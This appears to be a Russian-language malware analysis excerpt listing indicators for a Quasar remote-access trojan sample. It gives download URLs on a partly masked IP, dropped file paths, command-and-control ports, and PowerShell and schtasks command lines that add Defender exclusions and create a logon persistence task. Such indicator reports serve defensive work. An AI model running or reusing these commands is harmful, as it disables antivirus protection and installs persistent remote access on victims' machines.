Техническая информация
- <SYSTEM32>\tasks\quasar client startup
- http://86.###.229.160:8389/beauty of a virus.exe as c:\users\public\beautiful.exe
- http://86.###.229.160:8389/screenshot.jpg as c:\users\public\screenshot.jpg
- C:\users\public\beautiful.exe
- %APPDATA%\subdir\client.exe
- C:\users\public\screenshot.jpg
- C:\users\public\beautiful.exe
- %APPDATA%\subdir\client.exe
- '86.##7.229.160':8389
- '86.##7.229.160':4782
- '86.##7.229.160':4782
- 'C:\users\public\beautiful.exe'
- '%APPDATA%\subdir\client.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public' & powershell -Command Add-MpPreference -ExclusionPath (-join("$env:APPDATA", '\SubDir')) & powershell.exe -w hidden -c (...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\Users\Public'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath (-join("$env:APPDATA", '\SubDir'))
- '<SYSTEM32>\schtasks.exe' /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Public\beautiful.exe" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Quasar Client Startup" /sc ONLOGON /tr "%APPDATA%\SubDir\Client.exe" /rl HIGHEST /f